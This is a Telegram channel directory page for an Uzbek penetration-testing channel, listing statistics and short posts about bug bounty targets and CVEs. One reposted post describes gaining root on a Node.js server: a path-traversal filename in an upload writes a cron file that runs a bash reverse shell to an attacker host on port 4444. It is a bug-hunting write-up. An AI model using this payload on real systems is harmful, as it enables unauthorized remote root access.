tgindex
SanSec
@sansecузбекский

Penetration Tester | BSCP | CMPen - Android | 9x CVE

Последний пост
13 авг.
Последнее чтение
13 авг.
Постов за неделю
21
Всего постов
23
Тип
открытый
Язык
узбекский
В каталоге с
13 авг.
Подписчики
140
+1 за 1 дн.
Сутки
0
0,00%
Неделя
 
Месяц
 
Просмотров на пост
110
23 постов
Вовлечённость
78,6%
к подписчикам
Постов в день
3,0
всего 23
Упоминаний
1
каналов
Охват размещения
оценка
1/24сутки в ленте
99
1/48двое суток
113
1/72трое суток
122

Оценка по просмотрам недавних постов: пост набирает почти всё за первые сутки.

Посты

  • видео или голосовое, без подписи

  • New target in sansec.uz 🔥🔥🔥

  • 13 авг.7771из SecListForCyberStudents

    $150,000 Apple Bug Bounty 🍎 [CVE-2026-20685] Beyond Prompt Injection: Hacking Apple's Private Cloud Compute 🤯🔥 🔗 https://blog.sentry.security/beyond-prompt-injection-hacking-apples-private-cloud-compute/ 🔗 https://nvd.nist.gov/vuln/detail/CVE-2026-20685

  • New BBP targets are coming soon SanSec.uz

  • 12 авг.414из javasec

    Node.js. Webshell befoyda. Lekin...👀 Path traversal orqali RCE olish haqida eshitganmisiz? Bug hunting vaqtida unauth upload function topib oldim. Birinchi narsa — stack tekshirdim. Node.js. Demak webshell yuklashni deyarli foydasi yo'q, ko'pchilik shu yerda to'xaydi va keyingisiga o'tadi. Lekin men filename parametriga e'tibor berdim. Odatda bu parametr serverda fayl nomini belgilaydi. Sanitize qilinmagan bo'lsa — path traversal. Tekshirdim: filename=../../../../../../etc/passwd Server 200 OK javob qaytardi. Xato yo'q. Endi asosiy savol — process qaysi user bilan ishlayapti? Agar www-data bo'lsa /etc ga yoza olmayman. Root bo'lsa — boshqa gap. filename=../../../../../../etc/cron.d/backdoor file body'ga esa: * * * * * root bash -i >& /dev/tcp/x.x.x.x/4444 0>&1 Server 200 OK. Yuklandi. Endi faqat cron daemon ishlayaptimi degan savol qoldi — va u ishlayotgandi. Netcat'ni yoqib 60 soniya kutdim. connect to [attacker] from [target] uid=0(root) gid=0(root) groups=0(root) CVE kerak emas. 0day kerak emas. Webshell ham kerak emas. Faqat sanitize qilinmagan bitta parametr va root sifatida ishlaydigan bitta process. Asosiy muammo kod ichida emas — uni kim yozganida edi.🙂 Telegram📱 Linkedin 📱 Web✈️

  • 🙂 shunaqa logikani kim o'ylab topgan ekana

  • 12 авг.5431из sploitus_agency

    🙂 shunaqa logikani kim o'ylab topgan ekana

  • Asadbek Fatullayev is cooking 🔥🔥🔥 sansec.uz

  • Next CVEs 🔹 CVE-2026-72607 🔹 CVE-2026-72608 🔹 CVE-2026-72609 🔹 CVE-2026-72610 CNA sifatida yordam bergan @CNA_Uzbekistan va Jamshidga rahmat

  • 11 авг.102из kamoloff_log

    😎

  • New target in sansec.uz: https://apps.apple.com/us/app/zynygram/id6789012626 https://play.google.com/store/apps/details?id=org.zyny.app&hl=ru&gl=ru

  • 10 авг.771из SecListForCyberStudents

    Jenkins 0day from Turan Security Team https://www.cve.org/CVERecord?id=CVE-2026-19429

  • More and more targets are coming 🔥🔥🔥

  • New target in sansec.uz

  • Sansec.uz next target: http://taletalk.uz

  • https://www.instagram.com/reel/Db2LdJIsBo3/?igsh=MTJhcGE5amZ0djcycQ==

  • https://www.instagram.com/reel/Db2LdJIsBo3/?igsh=MTJhcGE5amZ0djcycQ==

  • 10 авг.1157из hudhud_cyber

    видео или голосовое, без подписи

  • видео или голосовое, без подписи

  • offsec machinelar haqida @saidakbarxon_m bro kanalida o'qib qogandim. Birinchisi qabul bolsa yana 4 ta tayyor. Bir yarim milyard som pul berishsa oshga eriman )))

SanSec — tgindex